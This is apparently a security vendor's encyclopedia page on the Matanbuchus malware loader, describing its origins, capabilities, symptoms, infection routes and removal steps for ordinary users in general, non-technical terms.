Innehållet på den här sidan är tyvärr inte tillgängligt på det språk du har valt.
Hem Matanbuchus

Matanbuchus

Also known as: Matanbuchus Loader, AveBelial

Category: Malware

Type: Loader, dropper, trojan, fileless malware

Platform: Windows

Variants: Win32/Matanbuchus, O97M.MATANBUCHUS.A, Win32/Matanbuchus!mclg, MatanbuchusDroper.dll, shell96.dll, ddg.dll, Trojan:JS/Obfuse.PRBF!MTB, Trojan-Downloader.Office.Doc (IKARUS)

Damage potential: Deployment of secondary malware, data theft, ransomware attacks, compromised computer systems, or entire networks.

Overview

Matanbuchus is a malware loader that’s been sold as malware as a service (MaaS) on dark web forums since early 2021. It’s believed to have been created by a hacker known as BelialDemon, who was also linked to another type of malware called TriumphLoader. Matanbuchus is sold through Russian-speaking cybercrime forums on a subscription basis, typically costing between US$2,500 and US$4,500 monthly. Access is often limited to a small group of clients to reduce exposure.

It is designed to help execute second-stage payloads, including remote access tools and ransomware. Matanbuchus is mainly known for its ability to run “.exe” and “.dll” files directly in memory, execute custom PowerShell commands, and stay persistent by setting up scheduled tasks. Matanbuchus has been used in attacks targeting educational institutions in the United States and a high-tech organization in Belgium.

Once on a system, Matanbachus uses various techniques to avoid being detected, including anti-analysis checks from security software. These evasion methods make it harder for security software to catch the malware, which makes it extremely dangerous.

Possible symptoms

Matanbuchus is designed to be stealthy, so it might not be obvious right away that it has infiltrated your computer system. However, some signs to watch for include:

  • Slower computer performance, overheating, or frequent crashes.
  • Increased network traffic or strange internet connections.
  • New files or folders you didn’t create.
  • New or unexpected programs appearing on your system.
  • Changes to system settings or desktop appearance.
  • Suspicious PowerShell execution in logs.

Sources of the infection

Matanbuchus’s delivery methods have changed a lot over time, but some of the most common ways it can get onto your computer are:

  • Malicious downloads through phishing emails (the malware often comes as infected Excel attachments that ask you to “enable content” or “enable macros”).
  • Fake software installers.
  • Drive-by downloads from compromised websites.
  • Exploit kits that scan a visitor’s device for known software flaws and automatically install malware if a weakness is found.
  • Third-party file-sharing platforms and torrents.

Protection

You can protect your computer from Matanbuchus and similar threats by following safe digital habits:

Matanbuchus removal 

If you suspect that Matanbuchus has infected your device:

  • Disconnect the device from the internet to prevent further communication with command and control servers.
  • Boot your computer in safe mode to prevent the malware from running.
  • Use updated security software to perform a full system scan and remove detected threats.
  • Review scheduled tasks and startup entries for unauthorized additions.
  • Manually delete all possibly malicious files that you don’t recognize.
  • Change all passwords, especially for admin or sensitive accounts.
  • If you're not sure the malware is completely gone, it’s safest to reinstall your whole system and restore your files from clean backups.

If you're uncertain or unable to remove the malware manually yourself, it’s best to seek professional assistance.